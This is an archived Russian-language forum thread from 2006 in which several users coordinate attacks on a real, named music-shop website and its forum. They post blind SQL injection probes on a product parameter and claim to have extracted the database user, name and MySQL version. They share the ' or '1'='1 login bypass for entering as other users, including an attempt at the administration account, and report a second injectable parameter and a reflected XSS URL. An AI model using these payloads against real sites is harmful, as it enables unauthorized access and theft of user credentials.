PDA

Просмотр полной версии : Blind SQL Injection в магазине у Земфиры


Dmcox
23.03.2006, 00:05
Есть товар по ссылке http://shop.zemfira.ru/?level=4&pid=18135540
Делаем запрос http://shop.zemfira.ru/?level=4&pid=18135540 AND 1=0 (нет товара :))
Делаем опять запрос http://shop.zemfira.ru/?level=4&pid=18135540 AND 1=1 (поевляется товар)
Так вот все бы хорошо юзера вытащил название базы тоже и версию MySQL, а вот пасс не как не хочет :(
Помогите заранее СПАСИБО :)

max_pain89
23.03.2006, 00:29
вот что еще нашел. на форуме если вместо логина и пароля вписать ' or '1'='1, то он войдет как дарья, id=1

ArdeOS
23.03.2006, 12:22
Можно зайти под "администрацией" если в логине написать "администрация' or '1'='1"
и в пароле ' or '1'='1 ... но пока не могу найти админку (((

max_pain89
23.03.2006, 18:53
Можно зайти под "администрацией" если в логине написать "администрация' or '1'='1"
и в пароле ' or '1'='1 ... но пока не могу найти админку (((

а что будет если ты что нибуть другое, не администрация напишешь, если честно ты просто чушь снес, т.к. ' or '1'='1 подразумевает первый попавшийся логин, обычно админа. Вот если логин будет "администрация", а пароль ' or '1'='1 , вот тогда ты зайдешь под администрацией, конечно если он найдет в базе такой логин.

+toxa+
23.03.2006, 19:32
Нашёл ещё одну скуль
http://www.zemfira.ru/?go=afisha&yy=2005'

SanyaX
23.03.2006, 19:54
ты где там зашёл если только через форум у меня ник ксю получается =))

+toxa+
23.03.2006, 23:07
Также нашёл XSS

ТУТ ОНА (http://www.zemfira.ru/?go=afisha&yy=2005<script>alert(/XSS by +toxa+/)</script>)

SanyaX
24.03.2006, 08:40
Если скуль есть то Xss уже не нужна =))

DRON-ANARCHY
25.03.2006, 00:33
Входит под каким попало ником... у мну Devill надо долго мучаться...

ArdeOS
25.03.2006, 00:39
Да, выходит так ...